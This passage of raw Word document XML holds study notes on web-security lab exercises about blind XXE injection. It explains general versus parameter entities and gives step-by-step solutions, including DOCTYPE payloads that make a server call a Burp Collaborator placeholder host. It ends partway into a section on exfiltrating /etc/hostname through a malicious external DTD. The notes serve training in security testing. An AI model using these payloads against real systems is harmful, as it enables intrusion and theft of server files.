        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt; ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578761EC" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>Replace the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>productId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E336A">
        <w:t> number with a reference to the external entity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC48940" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="00B1101F" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="31D25962" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t xml:space="preserve">Go to the Collaborator </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>tab, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001E336A">
        <w:t xml:space="preserve"> click "</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Poll now".</w:t>
      </w:r>
      <w:r w:rsidRPr="001E336A">
        <w:t xml:space="preserve"> If you don't see any interactions listed, wait a few seconds and try again. You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0AF10F" w14:textId="77777777" w:rsidR="001E336A" w:rsidRDefault="001E336A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5323D5FC" w14:textId="09BF8B08" w:rsidR="001E336A" w:rsidRPr="005B19D0" w:rsidRDefault="001E336A" w:rsidP="005B19D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Blind XXE with out-of-band interaction via XML parameter entities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130D8BF9" w14:textId="31CB71BF" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>General vs parameter entity declarations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4CDC68" w14:textId="6E4CE9D4" w:rsidR="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17B35ED5" wp14:editId="3DAD57C5">
            <wp:extent cx="5603953" cy="1911350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14129639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63911" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId7"/>
                    <a:srcRect l="17527" t="19988" r="20745" b="42583"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5631352" cy="1920695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5DDA35" w14:textId="77777777" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>1. General Entity Declarations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0488E844" w14:textId="77777777" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Defined with &lt;!ENTITY ...&gt; inside the </w:t>
      </w:r>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>DTD</w:t>
      </w:r>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13433759" w14:textId="77777777" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Replaced </w:t>
      </w:r>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>wherever they are referenced in the XML body</w:t>
      </w:r>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> using &amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>name;.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="187DD4B4" w14:textId="742E165C" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Think of them like variables/macros inside the XML </w:t>
      </w:r>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>document content</w:t>
      </w:r>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8E39FA" w14:textId="77777777" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Parameter Entity Declarations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7452E19E" w14:textId="77777777" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Defined with &lt;!ENTITY % ...&gt; (notice the %).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA65446" w14:textId="77777777" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Only used </w:t>
      </w:r>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>inside the DTD</w:t>
      </w:r>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>, not in the XML body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C238E3D" w14:textId="2D82BE7A" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Referenced with %name; and typically used to </w:t>
      </w:r>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>structure DTD definitions</w:t>
      </w:r>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327AE531" w14:textId="77777777" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0"/>
    <w:p w14:paraId="2C8DAE3D" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>This lab has a "Check stock" feature that parses XML input, but does not display any unexpected values, and blocks requests containing regular external entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52622550" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>To solve the lab, use a parameter entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5247DE60" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="00B1101F" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t> Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2ADF58" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>Visit a product page, click "Check stock" and intercept the resulting POST request in Burp Suite Professional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C70C5C" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>Insert the following external entity definition in between the XML declaration and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>stockCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E336A">
        <w:t> element. Right-click and select "Insert Collaborator payload" to insert a Burp Collaborator subdomain where indicated:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7431F3A5" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="00B1101F" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>stockCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> [&lt;!ENTITY % </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"&gt; %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>; ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5CF30F" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t xml:space="preserve">Go to the Collaborator </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>tab, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001E336A">
        <w:t xml:space="preserve"> click "Poll now". If you don't see any interactions listed, wait a few seconds and try again. You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B55B824" w14:textId="54F851E3" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>This would only work if you can control the XML body and insert &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>; somewhere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4286089B" w14:textId="556A5E42" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>In this lab, you can’t edit the XML body — only prepend a DTD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA5CFF7" w14:textId="5EC0F630" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>That’s why a parameter entity is necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7648C11B" w14:textId="60CF4627" w:rsidR="001E336A" w:rsidRPr="00B1101F" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> Exploiting blind XXE to exfiltrate data using a malicious external DTD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769FCDD6" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>This lab has a "Check stock" feature that parses XML input but does not display the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA87883" w14:textId="77777777" w:rsidR="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>To solve the lab, exfiltrate the contents of the /etc/hostname file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092C0F60" w14:textId="77777777" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> What’s happening here?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A569111" w14:textId="77777777" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">The lab is </w:t>
      </w:r>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>blind XXE</w:t>
      </w:r>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> → you can’t see the file contents in the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6608260B" w14:textId="77777777" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> the only way to exfiltrate data is to make the vulnerable server send it to you (Burp Collaborator) via an </w:t>
      </w:r>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>out-of-band (OOB) request</w:t>
      </w:r>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A87159" w14:textId="77777777" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
